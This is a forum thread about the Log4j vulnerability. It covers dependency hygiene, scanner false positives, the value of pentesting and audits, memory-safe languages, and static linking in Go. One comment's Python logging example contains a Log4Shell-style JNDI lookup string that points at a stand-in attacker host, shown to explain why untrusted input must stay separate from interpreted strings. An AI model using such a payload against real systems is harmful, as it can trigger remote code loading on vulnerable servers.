> With security, you need some online service so you can find the new CVEs every day.

Or you just do it manually if that service is down. It's weird to me that the argument for not having an automated, 3rd-party service is "if it goes down then you'll have to do things manually", when the alternative is "you always have to do it manually".

If you are comfortable trusting a third-party service to tell you when to upgrade, then that is absolutely an improvement over doing security updates manually. This is why I have unattended-upgrades set up on my Debian systems to automatically install updates from Debian Security every day. Sure, it may fail for whatever reason, but I am certainly not going to take the time to (or even remember to) update every day.


Yeah, honestly there's probably just a few libraries you're going to have to care about re: keeping up to date. Everything else can get updated opportunistically/ on some cadence. Your exposed attack surface for most software is pretty much your TLS library and network stack. The more mature you become the more of the attack surface you can try to track.

But basically if you just subscribe to a few projects' releases you can pretty easily get things pushed to you when it matters.


Oh I completely agree. I was referring to the parent saying that a third party is dictating what to build -- for security this is inevitable. For dependencies this can be solved by caching your .jars or whatever, but at some point you still always have a third party dictating what you're building.


Not Go


Still Go. I mean there's no central repository in the way there's one for npm, and yes you can point it to any git repo as the source for your dependencies, but the reality is most are on GitHub. So your central repository is GitHub.


Can you give me an example of a popular Go project that doesn't have any dependency on GitHub?


Isn't that just software though? If you fix bugs in your code, you'll introduce new bugs. If you don't fix bugs, you'll have bugs.


Ok, so what is the solution then? To me there isn't one. It's like, how do you prevent all car accidents? The only way would be to ban driving.


>So, should this be a manual process where I have to dig through obscure warnings every time I build something?

Also known as doing your job.


Better idea: stop logging.


Ironically, logging is one of the ways to help mitigate/detect security vulnerabilities.


It's not just logging. L4J is so extensible that people have used it for all kinds of things, way waaaaaayyyyy away from just logs. So disabling logs won't necessarily cut it.

I am no expert. I ended up indexing all the open source kruft I use to hold this ship of fools together, then verified that the Log4J pieces were definitely disabled with a bunch of monitoring while I tossed stuff at it. I did mention I am not an expert, right? I am sure there is a more Pro way to do this.


F around and find out basically. If you choose to build on the house of cards, thou reapeth what thou soweth or something.


problem: food contaminated

solution: stop eating


solution: find uncontaminated food, or make it yourself


option 1 - we and farmers, as professionals, are responsible for supplying stuff that is not dangerous and works as it should

Option 2 - which you are advocating - is that it's every man for himself, and we descend into a society of warring tribes of hunter-gatherers, or subsistence farming at best


option 2 is the only possible state of reality, because it is never possible to guarantee that everything works in every instance

let the buyer beware


I mean, how do you know your webserver doesn't have a bug? How do you know your OS doesn't? Just write those yourself? How do you know yours doesn't? One must still verify the key functionality regardless.

But, you're not wrong, some people reach for every library and framework they can, and others focus on building the most minimal and understandable thing that will work. I'm not saying write your own server in assembly, but avoid unnecessary junk and magic and libraries.

It's the classic dilemma: in this world of ours, one can either return to monke or progress to crab.


the issue is that this can pop up in any library, not just logging. It's about keeping your deps up to date (or not) by a "3d party" (assuming he means 3rd party)


Yes, this can pop up in any library. But only because developers aren't taught "don't put remote code execution into your code". You'd think that would be something that someone would teach, but it doesn't really come up. Remember that log4j was vulnerable because of a feature - it all worked as designed.


> The current software engineering paradigm has no meaningful answer to this

The answer is to stop using garbage software written in garbage languages. Of course the current environment is too high-time-preference for this to be economical in many industries.

We have lightweight-to-heavyweight formal systems which can almost completely or literally completely eliminate issues of the type seen with log4j, but due to the marginally higher up-front cost of using such systems, only firms with some combination of high stakes, low time preference, and foresight end up using them.


What counts as a garbage language? Java guys will tell you it's rust or go, go guys will tell you it's java or rust, rust guys will tell you it's java and go.


> What counts as a garbage language?

I assume it's one with GC.


Wouldn't it be one without gc? Gc collects the garbage and disposes of it, whereas in other languages it just piles up :D


Java person here. Yeah, Go looks a bit crufty, but they're gradually undoing the earlier opinionated choices that make me think that (Who needs generics? Who needs to tune the GC? Oh, our users do), but nah, we mainly hate on Scala when we have to maintain anything with Scala deps, just that damn ABI that's never compatible.


I'm not any of those guys, and of those 3 rust is by far the least garbage. Garbagicity is a spectrum.


I was sure reading your first post that you will propose rust. Rust users never cease to amaze me.


I'm not a "rust user" any more than I'm a java user (less, in fact). Your heuristic is probably picking up on the fact that people who pay attention to things like this tend to have correlated opinions.


To be fair there was also a significant chance he would think Rust was garbage and only assembly (or if you are lucky, C) are acceptable languages.


You still don't know how to spot them :). The borrow checker is a great invention, but for them it's the holy grail that will save us from bugs. Like in the past, people thought that GC was the solution to every problem. Youngsters must learn, we have to be patient.


'software written in garbage languages'

well, back to the mainframe it is then


Quite the opposite, we have very safe languages now in 2022. Any software that's not written in Rust or Haskell has to explain the trade-off of being written in an unsafe language. Of course the industry will still use unsafe languages, but we lack the awareness that we're intentionally writing garbage software in garbage languages that should be treated as radioactive material in any context where safety matters. If you pick a language without understanding this point, you're part of the problem. If you pick an unsafe language understanding that X matters more than safety, then you saw all of this coming and you made an educated gamble.


These Log4j issues aren't real hardcore exploits. They wrote a logger that could run arbitrary code, then were surprised when attackers figured out how to run arbitrary code.

It isn't a language problem, it is a developer practices problem. Developers code like security isn't a thing then are confused when their programs aren't secure.


> It isn't a language problem, it is a developer practices problem. Developers code like security isn't a thing then are confused when their programs aren't secure.

I'd prefer that the "fix" for this isn't "require that millions of developers around the world all change their behavior, and never screw up in the future".

Languages can still protect against these sorts of bugs. Effect systems can describe as a part of the type system or function signature what kinds of things a function can do. For example, you could have a logging function where you know that the only side-effect is that it can write to stdout or stderr, or a file. Running arbitrary commands would not be allowed, and would cause the program to fail to compile.

As a real-world example, I've used the Slick SQL library in Scala, and the query type has a type parameter for whether the query is a read or a write. It's easy to build a simple abstraction on top of your data layer to never allow a write to go through, for example, if that's something that's useful to prevent bugs. I think one thing I did with that was set things up so callers could not accidentally write to MySQL replicas; only reads could go to them, and writes had to go to the primaries.

Granted, it takes discipline to build and use such a system, especially one that has such fine-grained effects. (I would expect most are more like a binary "does not do I/O" or "does I/O".)


The issue is like SQL injection. Much like with SQL injection protection, the logger needs to separate "active" strings vs attacker-controlled "data" strings. It is pretty easy to design boring Java types that solve the issue. The only problem is they didn't. Unless this effect system somehow forces them to not do something dumb, we will end up with a logger that has effects set to "does everything under the sun", and a similar bug.
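The analogous habit in most logging APIs is to keep the format string fixed and pass untrusted input purely as data; a sketch with Python's stdlib logger (which does not evaluate lookups the way Log4j did, so this only illustrates the data-vs-"active"-string separation):

  import logging

  logging.basicConfig(level=logging.INFO)
  user_input = "${jndi:ldap://attacker.example/a}"  # attacker-controlled text

  # Untrusted input stays a plain argument; the format string is a constant.
  logging.info("login attempt from %s", user_input)

  # Splicing it into the string the logger interprets is the shape of
  # mistake described above.
  logging.info("login attempt from " + user_input)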


> It isn't a language problem

Exactly. This flamey sub-thread has no point here.


We've had safe languages for decades - for example Ada

https://www.adacore.com/about-ada


In what fashion does Rust prevent you from calling valid library code that has unexpected behavior?


Had to deal with some automated scan tool telling a client "you have log4j - you're vulnerable!" when... we didn't. A project was including a dependency on SLF4J and that project pulled in slf4j-log4j (IIRC). But it was not configured, wasn't compiled into the final jar, and... even if it was, it was a very old log4j (1.1 or 1.2 IIRC?). The vulnerability didn't affect that older version.

We had to spend a week back and forth with

"no, we're not vulnerable".

"But we see log4j is right there in the a file in the directory".

"No, it's not vulnerable and it's not being used and we can't reasonably fork the entire dependency just to remove that one sub-dependency from our project's dependency"

"But we see log4j is right there in the a file in the directory".

Also, there was no budget to do any sort of rewrite/refactor/etc anyway.


> We had to spend a week back and forth with

We've had something similar out of a pen test that noted we were using nginx for some of our internal dashboards/tools, and the version running (1.18 IIRC) was officially EOLed upstream, so it was flagged as a high security issue.

They initially wouldn't listen to the argument that we use stable/LTS Debian/Ubuntu releases only, and those hold functionality stable (which is one of the key reasons to use them) and backport security updates where relevant. We pointed them at the package changelogs and they were convinced that there was still a vulnerability not patched, but for some reason didn't want to tell us which. When we finally got that out of them, it turned out to be one that was introduced in a later version, so it was never relevant in the first place for the version the stable repositories included.

You would think a penetration testing company would have a clue about something so common…


If it was an unauthenticated test, I'm not surprised. Raising findings off of banners is notoriously error prone, but pentesters often err on the side of raising things that are dubious rather than leaving them out.

If it was a credentialed review, you'd have hoped their scanners would plug in to the appropriate Debian/Ubuntu security database and give you a less false-positive-prone set of findings (although with Debian-based stuff you still have the problem of scanners sometimes reporting the "unfixed" set).


Been in similar situations, it is not fun.

"You have a vulnerable version of netty"

"No, we don't, that's a false positive"

"No see, the tool says you need netty 4.x and that's version 1.x, you need to update"

"OK, but the tool is wrong, it's just picking up anything with 'netty' in the name, and that component is a wrapper around netty for some other thing, it only goes up to 1.8"

"You have to update it to 4.x, this is a vulnerability"

"Do you understand this isn't part of the thing you're concerned about"

"I am only concerned about shipping a product without vulnerabilities"

"Well this isn't one, because it's a false positive, here's the CVE, here's what it applies to, here's the link to this package on maven central, it's not part of netty, back off"

"But it's insecure, the tool says so"

We went round and round for about 3 hours until I told the guy (an infosec 'pro') to leave me alone until he'd figured out how to do his job... he came back the next morning for another 3-hour Slack argument along the exact same lines, at which point I told him to leave me alone permanently and to communicate through management if he had anything to say. I'm not massively impressed with infosec as a profession after a few similar encounters.


Security engineer here. This is sadly common. The grim fact seems to be that we have a dearth of information security analysts with engineering experience. If they don't have "Engineer" or similar in their title, odds are they haven't had the pleasure of building or maintaining a non-trivial unit of software over more than a quarter or so.

That said, I've seen the inverse problem: engineering staff who either don't understand how their dependencies are managed (not unreasonable for less experienced teams - NPM, for example, has a tendency toward huge dependency trees, and this can be a hard problem to manage for a big project) or who are, for a plethora of reasons, incentivized to push back on requests for work they don't perceive as important.

The middle ground here requires trust between both parties (InfoSec and Engineering org functions). Sadly, not all security programs are well managed and not all engineering teams have mature practices.

If you have time or capacity, you can get a lot of leverage here by educating your security analysts on how your technology works (e.g. how the build system functions, how your languages of choice share and bundle code). Trust can be built between engineering and infosec teams by educating where possible. Done well such practices can up-level both sides of these discussions and save you stress in the long run.


This is, for example, why we as a company deliberately took 2 hours to escalate Log4Shell internally - which was about 2-3 hours before it went globally holy-shit.

We took the time to analyze the vulnerability, and multiple competent people concluded: yup, this is serious. Then we figured out plans, mitigations, and communication paths to update the plans and mitigations together with ops, dev and other folks. And then we shoved all of that as a large document into the larger technical organization as "Holy fuck, the sky is falling, start patching, here's how to tell whether you have to, here's how you do it. Go".

And that's also something I'm currently telling our new full-time security engineer: be a bit mindful in how you communicate criticality and vulnerability. With my team of admins and SREs, you can be like "We're all doomed" and someone will go "but we don't deploy that feature, calm down. Would you like some tea? What evil thing did the CVE say to you?". Or they might escalate accordingly, if it looks bad to them too.

But if you do that to most of our dev-teams? That'll be just an unstructured mess, which will be worse than waiting a moment to structure a proper response to the threat.


> Trust can be built between engineering and infosec teams

Yes it can, and I have worked with 'good' infosec people who were all about improving practices together. That attitude goes a long way - developers (well, the good ones) want to ship secure stuff and want to fold in best practices.

But the profession is unfortunately rife with people who don't know as much as they think they do, and who wade in heavy-handed, laying down the law to developers who might have been round the block once or twice themselves...

I wonder if it wouldn't be better to have a hybrid role that is part of engineering but has specific responsibility in this area, rather than, as is often the case, an external party (or a separate team) that is perceived as adversarial.


Some organizations do do this and they call them product security engineers or similar. Sadly, this doesn’t remove the need for an informed organization at large—that function covers a lot more than securing code—but it’s absolutely something that has been done.

There is one caveat however: you’ll probably still need dedicated security analysis or security engineers outside the chain of command of your product or engineering org.

There is a degree of necessary opposition in the pressures and incentives of infosec departments vs product departments: product organizations are rewarded for shipping more, while infosec organizations are rewarded for preventing incidents.

The most common result of this contention is the kind of situation people often lament in the comments here—security programs that are either ineffective, heavy-handed, or both.

In my mind, a good security program positions itself as an enablement function and should strive to educate and inform over all else. People close to the work will be best positioned to make decisions about effective ways to harden their systems when informed of likely risks, requirements, or other security considerations.

With any luck this minimizes the need to mandate security-motivated changes, and it changes the dynamic when your local security professional comes by with specific concerns. It’ll be less of “the sky is falling” and more of “we saw this specific problem and would like to work with you to fix it”.


I run a security team in a large company.

What you described is usually the result of some "consulting company" (in our case, big ones) that drops findings on you with zero actual knowledge.

Every year we "review" these with the board and it is annoying as fuck.

Recently they got a new manager who understands we are in the same boat. They have to provide a report with some findings and I need to have a secure environment. We talked this over and suddenly the board presentation was cool.

As for internal teams, I have a few extraordinary people. They are very young, and I had to coach them on how a vulnerability is or isn't actually critical depending on the context, the data, etc.

So not all cybersecurity teams suck :)


Hi! Question from a fellow practitioner: What tools or processes do you and your team use to identify false positives in such scans and reports? How do you track out-of-band mitigations against real-but-unreachable vulnerabilities that have been identified? e.g. A WAF set to intercept requests that trigger a specific vuln, or network segmentation to limit the scope of a moderate vulnerability.

In my experience tuning out false positives and other noise is fairly straightforward when you're only looking at CVEs, but things rapidly break down when you're trying to prioritize work with limited resources (only so many security engineers and engineering teams with spare cycles on their roadmap).

I have yet to find a good solution here other than manually whitelisting specific vulns in some kind of tracker and reviewing them whenever the network topology or configuration for an application changes.

Curious to hear your experiences, though I suspect this is a common and difficult to solve problem.


Well, this is a real circus.

I have tested and deployed several scanning tools (and contributed to Nessus some years ago - their scanning capacity was really mediocre compared to the precision of the results; on our 100k+ IPs across 10.x networks the time to scan was horrendous, but once an IP was scanned, the results were fine). A small disclaimer: I use several solutions but have no stake in any of them (neither company nor personal). I have built relationships with the vendors that help me provide substantiated feedback, which sometimes even gets taken into account :)

There are several issues, none of which has an automated fix.

First, there is the criticality of the finding. We found that often (especially on Linux) you will get a "raw" critical issue on a component that was not patched. And why was it not patched? Because the vendor set a low severity level. That is when the discussion between the security team and the OS team starts - I have found experimentally that the vendor rating is usually better, because they take into account the actual context of the deployment, especially for libraries.

OTOH, CrowdStrike's vulnerability rating (I forget the name of the component, it sits on top of the EDR) is actually two ratings: the CVSS-related one, and their own, where they look at actual exploits and deployment. I have decided that critical + critical = actually critical, and must be patched no matter what. This is the only way I have found to quantitatively auto-decide on important patches. The goal is of course to patch everything, but the reality is that there are so many loose ends in products that fighting for anything below the top two levels does not make sense.

The very sad thing here is that this is perceived as an issue with the OS/middleware and not with the shitty products vendors deploy. They use undocumented or weak solutions and then cry when everything breaks down. I develop myself (as an amateur) and have never had any issues in 30 years when upgrading the OS, because I actually care about following the docs.

The second problem is that today's products have nested dependencies. For our own products we do an awfully time-consuming but precise review of the actual impact on the product, but that is because people actually care (this is not my team so I am not taking any credit - I just like their approach). When a customer comes with a question, we have a comprehensive response. Sometimes this works, sometimes not - some people, when they see "vulnerability", stop at that and just want the word to disappear.

When we are on the receiving side of such products (and log4j is a perfect example), we ask the vendor. If it is open source, the answer is usually very good; there are often GitHub/GitLab issues that address the point. Commercial vendors are much worse, because they either say "no worries" or take weeks to respond. When a "no worries" comes from a company that cannot explain why they limit their passwords to 27 characters, it is worrisome - a bit like when my children say "no worries" (this is the moment when I start to worry).

Scanners are quite slow to respond to non-obvious vulnerabilities (the ones you cannot easily tag through OVAL). For log4j, for instance, I coded a scanner/reflector on the Thursday night (the information popped up about noon on Thursday, western Europe time). The scanners followed up after a week, but one could find good open source ones quickly as well. So my advice would be to closely monitor GitHub for such tools when there is pressure (we switched to another tool for log4j when my team and the OS team kept finding better ones). This also led us to investigate a fantastic tool/framework for writing scanners, whose name escapes me right now but I can comment here when I am back from vacation and get hold of the gal who is looking at that.

The TL;DR version is that

- a few tools provide a way to quantify the risk (that's a huge simplification, but it's the best I can do) - at least there is a reasonable chance that you will not miss the worst ones

- GitHub activity when shit hits the fan is extraordinarily useful - the best tools emerge there, before the vendors catch up

- vendors are middling, but it is not as bad as you read

- your CISO should make the effort to communicate that there will be availability issues when the IT/security team decides to switch off a key component (say, email) if it presents a risk to the company. I am lucky to have a CEO who not only understands this but actually challenged me once on why I did not cut things off earlier. Having that arranged upfront takes a huge amount of stress off the security team.

- and finally the sad reality is that the vast, vast majority of issues we get are from users who click on stuff

I am sure I forgot a lot - let me know if I can help with some details.


Thank you for the fantastic response, I always enjoy seeing how folks approach these problems. Your points about the inconsistency between how vendors and OS distributions handle things are well taken and mirror some things I've seen.

Please do feel free to reach out via email or LinkedIn (deets in my profile), always a pleasure talking shop with folks in the industry.

Cheers!


I sometimes feel that my job description could be "arguing with people who feel passionately about something they don't understand".


Man: What is the secret to eternal happiness?

Guru: To not argue with fools.

Man: I disagree.

Guru: Yes, you are right.


Like I usually say, everyone is a doctor and a football coach, and recently a security expert.

I am coming to a point in my 25+ year career where I have stopped arguing. I just tell them that they are wrong, but I do not care until they put the company in danger.

Unfortunately this leaves me with fat PowerPoint presentations, which seem to be the modern documentation of a company.


Many advisory jobs fall into this bucket. I'm of the impression that anybody who reaches senior/staff+ roles ends up doing this as part of their day-to-day.


Isn't that just a description of life in general?


Not for the people who are arguing with me.


Over-reliance on tools is a bad problem in infosec, often due to the range of areas practitioners have to cover. That said, a good infosec person should always understand where their tools are limited, so they can work around those deficiencies.


It sounds like some of this should be automated. If all the infosec person is doing is running a tool against a repo and reporting results, that should be automated. When there are false positives, that should be annotated in the repo with multiple people checking off on it.

I’ve been impressed by automated bug checking tools in the past and I see this as part of the same issue. I don’t see why this would need an FTE to run code against a tool. CI should be enough.


It's the "intelligent life form determines the alert is a false positive" part that's not automated.


Of course that’s not automated.

From the parent, it sounded like their issue wasn’t figuring out whether something was a false positive. It was that one “intelligent life form” ran a tool and then wouldn’t accept when another “intelligent life form” assessed that a flag was a false positive.

If the infosec person is just running a tool and reporting results, why are they part of the loop? Make running the tool mandatory for each git push back to the main repo. Then, if/when there is a false positive, allow them to pass if they’ve already been “approved” by some means (like a .infosec_ignore file).


In this case they weren't even running the tool, just looking over reports generated by the dev team.


Same experience several times. A tool picking up example-code dependencies from our dependencies is another form of this.


This is where you could probably just have renamed the file.


Once you realize this sort of shallow, automated audit exists to grease the wheels of some security theater operation, this sort of back and forth makes sense.

False positives don't waste the security team's budget, and are the only surefire way to justify ongoing expenditures on the scanning tool.


So somehow false positives negate all the actual positives caught and corrected? The only true solution is what? Manual audit of everything by some perfect human security practitioner? I suppose the same applies to automated development tools then.

I will concede there probably are some firms out there acting poorly that way. When aren't there? Humans, sigh. But by and large, automation - and the problems inherent to it - is required.


I was in this industry for a while (I did 5 years full time for a security company).

> I will concede there probably are some firms out there acting poorly that way.

This is a hilarious take. Here's mine: The vast majority of these firms are here for liability. They do not provide security, they provide security theater so that if/when something goes wrong, the client can claim to have followed best practices, and that it's not their fault.

This style of theater is RAMPANT in the industry. Literally most of them come in with some version of a shitty automated tool, often with false positives in the 95%+ range, and then you check off checkboxes to make legal happy, and ensure that your insurance (or your customer's insurance) will pay if you get compromised.

This is not limited to small companies, but is instead mostly how large banks, credit firms, and large enterprises work.

The entire damn show is for liability, and half of these "security professionals" can't do anything other than read the message coming out of their tool. They are utterly incompetent when it comes to applying logic to figure out whether a specific use of a "risky" tool/language feature is a genuine problem, vs a god damned fucking regex match from their tool on something completely unrelated.

I went in as a naive young dev, I came out with ZERO respect for this industry, and a healthy dose of skepticism around anything these folks are saying.

Security researchers? Generally fine (although there's a new breed of them that simply submits inane non-vulnerabilities over and over to attempt to get bug bounties from large companies)

Security advice from open source devs? Generally top notch, listen to it.

Security advice from that contractor your company paid? Expect to have 95% false positives, and they'll miss the 2 places you know actually have issues. But it's ok because you'll check all the boxes on their sheet and legal is happy.

---

I'm waiting for insurance companies to wise up and stop covering companies who are breached. Prices are already shooting way up, since it turns out security theater does a very bad job of stopping real threats, and that's what this industry is right now. Might as well be the TSA of software: gonna frisk you real good, and then flunk every fucking test.


My project's client, a major local bank, mandates pen testing before we go live with the product that we're building.

Due to time and resourcing constraints, and a fixed launch date (don't ask), we had to significantly reduce scope. We are currently launching with probably 30% of the original scope. Once live, we'll iteratively add features and grow our product back to the original vision.

Will we have to do pen testing again in the future? Nope. Even though a lot of our planned post launch features involve integrations with 3rd parties and the exchange of sensitive personal data.

Pen testing is 100% a box-ticking exercise in my opinion. And most of the shops that offer this service are set up to provide it in a way that lets large corporates appease legal.

I really don't like pen testing as a practice and seriously dislike when it's a go live impediment.


What you’ve described is an issue with the bank’s procedures, not pentesting.


> I really don't like pen testing as a practice

Could you elaborate on this a bit? What's wrong with it? To me it seems the only logical thing to spend external security budget on (or an internal red team, if the company is big enough to afford it).


Thank you, that is a very interesting take. I've always played with the idea of pivoting into the security industry, because playing Hack The Box and the like is something I do in my free time and enjoy. Maybe I'll just do some bug bounties or something for fun instead. I think it's a bit different in Europe, though; at least anecdotally there seems to be more code auditing and the like (more product security) instead of pen testing (more network/infrastructure security).


I'd say don't let yourself be discouraged by GP. Just look into a company before you apply. Many have public reports and/or security research, both of which you could use as indicators.

Here's a repo with lots of public reports by various consultancies, you could use that as a starting point: https://github.com/juliocesarfort/public-pentesting-reports


This post is amazing. Thank you. This captures my thoughts on this problem space very well!

Security vs compliance is real. I love how you just map "compliance = security theater" because that is really the best way to describe it. The TSA bit has me in tears!


Back in the late 90s, I was working at a small web hosting company (take note). One day, a 500+ page report from a recent PCI compliance check landed on my desk. It was nothing but "OMFG! DOMAIN1 RESPONDED TO PING! YOU WILL BE PWONED! OMFG! DOMAIN1 HAS DNS RECORDS! YOU WILL BE PWONED! OMFG! DOMAIN1 HAS A WEB SERVER RUNNING! YOU WILL BE PWONED!". Over and over again. For every domain we hosted. A complete and utter garbage report.

Better: just summarize the IPs scanned and report back which services were found running on said IPs. Then in an appendix, list why each service is (or might be) problematic. "Ping? Attackers might be able to figure out your network topology and that is bad because blah blah blah blah."

But 500 pages of this automatic breathless garbage? Utter trash.


The problem isn't that audits are inherently worthless, it's that most of these tools are very low-quality implementations of the concept.

In one of my past jobs I was an early-mover on doing a lot of our ops on Linux and the audit tools had no concept of the backport security model whatsoever. If you were running on some kind of LTS distro rather than a current distro, it would see "gosh you're 3 minor versions behind, you have a ton of unpatched vulnerabilities!", but in actuality you didn't, because the fixes got backported into security releases (the "31" in something like "3.1.22~ubuntu31" for example). But the tool was dumb and it just had a table that said "anything under 3.4.14 is vulnerable" even when it wasn't necessarily.

OP's "log4j 1.x is not vulnerable to this in the first place" is a similar thing, where either someone forgot to put in a value for "min vulnerable version" or the tool doesn't understand the concept of a min version at all. To be fair, that can be genuinely tricky in Java: best case you are reading manifest files to try and pick out a version, but some legacy stuff doesn't have manifests, especially very legacy fat-jar stuff. Yes, that stuff didn't go away, it's still out there in places!

And to be clear, this was a long-running issue... it wasn't a case of "oh, our tool doesn't understand LTS, I get it" and then they left me alone... every month they'd be back at me with a new list of utility vulnerabilities, even though I repeatedly explained that I had set up apt-get to auto-upgrade every night and reboot, so we were running whatever the latest available security backports were, and that just like the last 10 times these were more false positives.

And again, this isn't just "we have to run it by you no matter what" and they leave you alone either. What security really wanted was for me to run windows and manually install the updates and get back in line with everyone else, even though that would have been a less secure outcome than my locked-down linux boxes. But this wasn't my day-job at the company so to speak, it was helping out another project with some ops and it needed to be as low-effort as possible (and to be fair their requirements weren't steep, auto-patch-and-reboot was fine by them and never caused any breakage during my tenure there).

The root problem is that these sorts of tools aren't a substitute for an actual security culture, they're often a symptom of a compliance requirement and the whole thing turns into a box-checking exercise. Someone is on their ass about this because of contractual requirements or PCI requirements, and they bought the cheapest thing off the shelf that would check the box, and they are implicitly showing you here that they don't even understand how to interpret the output of that.


> The problem isn't that audits are inherently worthless, it's that most of these tools are very low-quality implementations of the concept.

I think the problem is that the current audits are inherently worthless. I've never seen another industry that would accept a 95% false positive rate from a tool. But that's on the low end from my experiences (I've done 4 major codebase audits, and worked in the security industry for 5 years)

Tools that routinely spit out 1000 plus vulnerabilities, and 6 months later you've checked off all of them without a single valid vulnerability in the list (but 3 you found yourself during that time that were missed entirely by the shitty regex that is really the entire tool in question).


> current audits are inherently worthless

And that's not helped by the warped incentives. Security has to be, fundamentally, assessed as a holistic thing and even highly skilled technical people can't really do that with modern systems. Now you add in auditors, a profession populated by glorified accountants, working off of gargantuan checklists.

You invite and reward mediocrity. At best.

Anyone good enough to actually understand and able to work with the technology will find a job in the industry, for twice the pay. And the same applies to regulators. They can't retain technically skilled staff, so they are filled with accountants. As a result we get rules and regulations, written by technically incompetent accountants, aimed at technically incompetent accountants.

To fill the gaps we have shitty, false-positive ridden, noisy, outright useless tools that generate reports intended to satisfy accountants. Security has next to nothing to do with that.

And to top it off, we have an entire industry riddled with so-called security engineers who know how to run a tool (with some marginally helpful StackOverflow pointers) and export a report, but can't for their life actually interpret, let alone VERIFY, any of it.

That has as much to do with security engineering as burning ants with a magnifying glass has to do with biology.


You could set your build up to not auto-download questionable stuff from untrustworthy machines on the Internet.


> we can't reasonably fork the entire dependency just to remove that one sub-dependency from our project's dependency tree

If you use Maven, just exclude that transitive dependency from the explicit dependency.

But yeah, dumb warnings are dumb.

  <dependency>
    <groupId>com.example</groupId>
    <artifactId>my-dependency</artifactId>
    <exclusions>
      <exclusion>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-log4j12</artifactId>
      </exclusion>
    </exclusions>
  </dependency>
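(Once the exclusion is in place, running `mvn dependency:tree` is a quick way to confirm the offending jar no longer shows up in the resolved tree.)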


Bingo.


We (read: I) face this on an ongoing basis.

We can't upgrade the components that bundle log4j, for various reasons, starting with licensing rules. So we made the decision to strip the JndiLookup class out of every project that uses Java. Clients do various scans and rely on dumb version-string matching and/or banner grabbing. We have to routinely point them to our VERY detailed and explicit log4j response document and carefully explain to them that their scanners are relying on insufficient detection methods.
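(For reference, the stripping itself is the one-liner that was widely circulated as a Log4Shell mitigation - the jar name below is illustrative and has to match wherever the bundled copy actually lives:)

  zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class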

Security teams are quite content once we give them a detailed explanation of the false positive. And then they forget, or deliberately choose to ignore the lesson, and the next time they run their scans they get the same false positives again.

Even supposedly state-of-the-art security tools, to this day, refuse to actually verify their detections.


I recall that NVIDIA had to release an update to their CUDA Toolkit around when the Log4j vulnerability was announced. They weren't using it but the file was being distributed, presumably for a similar reason. I'm guessing they might've had similar complaints coming in.


Configure your build tool to exclude the transitive dependency.


Typically there's a way to suppress specific warnings in systems like these. In your company's situation, I would look at moving away from a scanning system if it didn't allow overrides like this.


So far this is the best approach I've found. The scanning tools rarely include that ability but if you build tooling around them you can maintain exclusion lists, for particular vulnerabilities, library/version pairs, etc.

Unfortunately it does mean there's no getting around having someone manually deal with false positives.


Yup, that's us. Same deal exactly. They already stoppered our entire team for eight months with a tools audit a few years ago, so I hung that dead fish above the conversation when this came up. "Uh, ok, don't want to do that, sooooo . . recommendations?" "Let's isolate it, toss stuff at it, and see if it lights up" "Sounds good to me. FIXED"


I thought Log4j 1.1 was vulnerable, just to a lesser extent, and there wasn't a lot of information on it because 1.x is end of life


EOL libraries are themselves vulnerabilities. It's not really good to even have this reachable on the classpath; in cases like the grandparent's, you should look at removing the class from inside the JAR (or removing the JAR itself) if possible, to ensure that the vulnerable code cannot get called under any circumstances.


See https://logging.apache.org/log4j/1.2/ . Plenty of vulnerabilities. Just different ones


Log4j 1.x is vulnerable, but to different things and not as badly.


> Log4j 1.x is vulnerable, but to different things

And the most common use of log4j 1.x (logging to the console or to a file, with a simple configuration) uses none of the vulnerable parts.


Someone said "hey, log4j 1.2 wasn't that bad" after the Log4Shell vuln and came up with the idea of reload4j, which is just log4j 1.2 with its known vulnerabilities, bugs and performance issues fixed. Complete feature freeze besides that. Considering that a logging tool shouldn't have that many features, and that log4j 1.2 was being used by a lot of companies (just see the Maven Central stats), there is no need to add more features to reload4j, which I find kind of cool.


Log4j-api isn't vulnerable, and the slf4j-log4j bridge depends on it; log4j-core is. All of our internal security scanners failed to make this distinction, so we had to post-filter ourselves.


Sometimes people ask me why I'm so skeptical about software delivery techniques involving bundling and static compilation. This is a thing that people sometimes ask.


It's funny how every Go project seems to statically compile in the same libraries. If just one of them has a serious vuln, we're talking nearly every Go project in the world having to be patched and recompiled, or upgraded with potentially breaking changes. And as we know from Log4j, that can be incredibly difficult. Just finding all the affected Go apps will be a nightmare, and patching will not be as simple as "replacing a jar in a zip file".


> Just finding all the affected Go apps will be a nightmare

This isn't even a new situation. We had the exact same problem some time ago with zlib: it was also embedded everywhere, and just finding all the affected apps was a nightmare. It's the reason most Linux distributions came to deeply dislike bundling libraries, instead preferring a dynamically linked shared copy from a separate package. Unfortunately, it seems the lessons from that zlib incident are being forgotten, perhaps because too much time (on the order of decades, IIRC) has passed since then.


> It's the reason most Linux distributions came to deeply dislike bundling libraries

Is it, though? Seems like it would be trivial for a distribution maintainer to write a script to go through the dependency trees of every package, and then automatically rebuild any that depend on the vulnerable library. I don't think discovery is the problem.

I suspect this is really a legacy of when disk space was not so cheap; dynamic linking means smaller binaries (usually). And, even today, many distros would probably prefer their users to only download a 2MB library update from them than have to download 500MB worth of updated programs. Bandwidth is still not as cheap as we'd hope.

Edit: just realized you're probably talking about software packages vendoring in their own version of a library, not about a package statically linking with a system-provided copy of the library.


The situation for Go seems to have gotten a bit better with Go 1.18. Go binaries now include the versions of all the modules in them, and these can be listed with `go version -m <path-to-binary>`.

That won't help you rebuild the binary, but at least you can find them.


That's fantastic. Since Go has gone all-in on static compiling, it'd be awesome if they made it possible to update a dependency without recompiling (or even having the source code for) the rest of the program.

In addition to making it easier to do security updates in situations like log4j, it'd also make it easy to comply with LGPL license terms.


That doesn't seem possible. The benefits of static linking are that unused methods, symbols, etc. can be stripped, along with cross-library optimizations like inlining. There aren't necessarily going to be clean library boundaries left at all, at least not in any way that looks anything like upstream. And it's also going to vary from binary to binary, depending on what exactly each one used from the dependency.

What you're describing would be more akin to shared linkage just in a single blob. That seems like it'd be a worst-of-both-worlds result.


Instead of "update without compiling", maybe it would be better to attach an archive of the source to the binary, so you can update by compiling? Or maybe attach some suitable intermediate format?


Wouldn't that require the ABI, or at least the API, to be the same across versions of the affected library? That feels like it may be possible with enough tooling, but still very hard to enforce.


The library being patched needs to use the same ABI, yes. So you can usually only patch the same version of a library, not upgrade it.

